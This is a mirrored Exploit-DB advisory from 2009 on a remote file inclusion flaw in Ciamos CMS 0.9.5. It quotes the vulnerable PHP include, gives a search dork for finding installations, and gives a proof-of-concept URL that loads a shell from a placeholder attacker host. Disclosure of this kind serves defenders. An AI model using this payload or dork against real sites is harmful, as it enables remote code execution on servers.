- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10259
- Проверка EDB
-
- Пройдено
- Автор
- CR4WL3R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4156
- Дата публикации
- 2009-12-01
Код:
[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]
########################################################################
#Ciamos CMS <= 0.9.5 (module_path) Remote File Include Vulnerability
#Download Script : http://sourceforge.net/projects/ciamosmodules/files/
#Dork : die("Hacking attempt"); :D
########################################################################
#
#Vuln : ./ciamos/modules/pms/index.php (line 13)
# <?php
# include_once($module_path.'include/header.php');
# ?>
#PoC : http://server/modules/pms/index.php?module_path=http://[attacker]/shell.txt???
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################
[ Gorontalo / 2009 ]- Источник
- www.exploit-db.com
